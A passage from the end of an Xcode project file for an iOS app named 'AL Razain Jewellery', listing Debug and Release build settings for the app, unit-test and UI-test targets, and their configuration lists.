				GCC_WARN_UNDECLARED_SELECTOR = YES;
				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
				GCC_WARN_UNUSED_FUNCTION = YES;
				GCC_WARN_UNUSED_VARIABLE = YES;
				IPHONEOS_DEPLOYMENT_TARGET = 13.7;
				MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
				MTL_FAST_MATH = YES;
				ONLY_ACTIVE_ARCH = YES;
				SDKROOT = iphoneos;
				SWIFT_ACTIVE_COMPILATION_CONDITIONS = DEBUG;
				SWIFT_OPTIMIZATION_LEVEL = "-Onone";
			};
			name = Debug;
		};
		04C75D982590D8CE0092A096 /* Release */ = {
			isa = XCBuildConfiguration;
			buildSettings = {
				ALWAYS_SEARCH_USER_PATHS = NO;
				CLANG_ANALYZER_NONNULL = YES;
				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
				CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
				CLANG_CXX_LIBRARY = "libc++";
				CLANG_ENABLE_MODULES = YES;
				CLANG_ENABLE_OBJC_ARC = YES;
				CLANG_ENABLE_OBJC_WEAK = YES;
				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
				CLANG_WARN_BOOL_CONVERSION = YES;
				CLANG_WARN_COMMA = YES;
				CLANG_WARN_CONSTANT_CONVERSION = YES;
				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
				CLANG_WARN_EMPTY_BODY = YES;
				CLANG_WARN_ENUM_CONVERSION = YES;
				CLANG_WARN_INFINITE_RECURSION = YES;
				CLANG_WARN_INT_CONVERSION = YES;
				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
				CLANG_WARN_STRICT_PROTOTYPES = YES;
				CLANG_WARN_SUSPICIOUS_MOVE = YES;
				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
				CLANG_WARN_UNREACHABLE_CODE = YES;
				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
				COPY_PHASE_STRIP = NO;
				DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
				ENABLE_NS_ASSERTIONS = NO;
				ENABLE_STRICT_OBJC_MSGSEND = YES;
				GCC_C_LANGUAGE_STANDARD = gnu11;
				GCC_NO_COMMON_BLOCKS = YES;
				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
				GCC_WARN_UNDECLARED_SELECTOR = YES;
				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
				GCC_WARN_UNUSED_FUNCTION = YES;
				GCC_WARN_UNUSED_VARIABLE = YES;
				IPHONEOS_DEPLOYMENT_TARGET = 13.7;
				MTL_ENABLE_DEBUG_INFO = NO;
				MTL_FAST_MATH = YES;
				SDKROOT = iphoneos;
				SWIFT_COMPILATION_MODE = wholemodule;
				SWIFT_OPTIMIZATION_LEVEL = "-O";
				VALIDATE_PRODUCT = YES;
			};
			name = Release;
		};
		04C75D9A2590D8CE0092A096 /* Debug */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 5D9E1BD738921DC8BF9FC5D2 /* Pods-AL Razain Jewellery.debug.xcconfig */;
			buildSettings = {
				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = "AL Razain Jewellery/Info.plist";
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = "Gabani-Solution.AL-Razain-Jewellery";
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
			};
			name = Debug;
		};
		04C75D9B2590D8CE0092A096 /* Release */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 7E79FBB9FF7327DF95EF8823 /* Pods-AL Razain Jewellery.release.xcconfig */;
			buildSettings = {
				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = "AL Razain Jewellery/Info.plist";
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = "Gabani-Solution.AL-Razain-Jewellery";
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
			};
			name = Release;
		};
		04C75D9D2590D8CE0092A096 /* Debug */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 31E2AEC14D68598F8AE6C702 /* Pods-AL Razain JewelleryTests.debug.xcconfig */;
			buildSettings = {
				ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
				BUNDLE_LOADER = "$(TEST_HOST)";
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = "AL Razain JewelleryTests/Info.plist";
				IPHONEOS_DEPLOYMENT_TARGET = 13.7;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
					"@loader_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = "Gabani-Solution.AL-Razain-JewelleryTests";
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
				TEST_HOST = "$(BUILT_PRODUCTS_DIR)/AL Razain Jewellery.app/AL Razain Jewellery";
			};
			name = Debug;
		};
		04C75D9E2590D8CE0092A096 /* Release */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = EE06749678CD94513C5AD629 /* Pods-AL Razain JewelleryTests.release.xcconfig */;
			buildSettings = {
				ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
				BUNDLE_LOADER = "$(TEST_HOST)";
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = "AL Razain JewelleryTests/Info.plist";
				IPHONEOS_DEPLOYMENT_TARGET = 13.7;
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
					"@loader_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = "Gabani-Solution.AL-Razain-JewelleryTests";
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
				TEST_HOST = "$(BUILT_PRODUCTS_DIR)/AL Razain Jewellery.app/AL Razain Jewellery";
			};
			name = Release;
		};
		04C75DA02590D8CE0092A096 /* Debug */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = 016BB933A835A32AF293182E /* Pods-AL Razain Jewellery-AL Razain JewelleryUITests.debug.xcconfig */;
			buildSettings = {
				ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = "AL Razain JewelleryUITests/Info.plist";
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
					"@loader_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = "Gabani-Solution.AL-Razain-JewelleryUITests";
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
				TEST_TARGET_NAME = "AL Razain Jewellery";
			};
			name = Debug;
		};
		04C75DA12590D8CE0092A096 /* Release */ = {
			isa = XCBuildConfiguration;
			baseConfigurationReference = AFC8F5574EDAD021B9BE2175 /* Pods-AL Razain Jewellery-AL Razain JewelleryUITests.release.xcconfig */;
			buildSettings = {
				ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
				CODE_SIGN_STYLE = Automatic;
				INFOPLIST_FILE = "AL Razain JewelleryUITests/Info.plist";
				LD_RUNPATH_SEARCH_PATHS = (
					"$(inherited)",
					"@executable_path/Frameworks",
					"@loader_path/Frameworks",
				);
				PRODUCT_BUNDLE_IDENTIFIER = "Gabani-Solution.AL-Razain-JewelleryUITests";
				PRODUCT_NAME = "$(TARGET_NAME)";
				SWIFT_VERSION = 5.0;
				TARGETED_DEVICE_FAMILY = "1,2";
				TEST_TARGET_NAME = "AL Razain Jewellery";
			};
			name = Release;
		};
/* End XCBuildConfiguration section */

/* Begin XCConfigurationList section */
		04C75D6A2590D8CC0092A096 /* Build configuration list for PBXProject "AL Razain Jewellery" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				04C75D972590D8CE0092A096 /* Debug */,
				04C75D982590D8CE0092A096 /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
		04C75D992590D8CE0092A096 /* Build configuration list for PBXNativeTarget "AL Razain Jewellery" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				04C75D9A2590D8CE0092A096 /* Debug */,
				04C75D9B2590D8CE0092A096 /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
		04C75D9C2590D8CE0092A096 /* Build configuration list for PBXNativeTarget "AL Razain JewelleryTests" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				04C75D9D2590D8CE0092A096 /* Debug */,
				04C75D9E2590D8CE0092A096 /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
		04C75D9F2590D8CE0092A096 /* Build configuration list for PBXNativeTarget "AL Razain JewelleryUITests" */ = {
			isa = XCConfigurationList;
			buildConfigurations = (
				04C75DA02590D8CE0092A096 /* Debug */,
				04C75DA12590D8CE0092A096 /* Release */,
			);
			defaultConfigurationIsVisible = 0;
			defaultConfigurationName = Release;
		};
/* End XCConfigurationList section */

		
			/* Begin PBXBuildRule section */
			

			
	
			/* End PBXBuildRule section */
		
		
	};
	rootObject = 04C75D672590D8CC0092A096 /* Project object */;
}
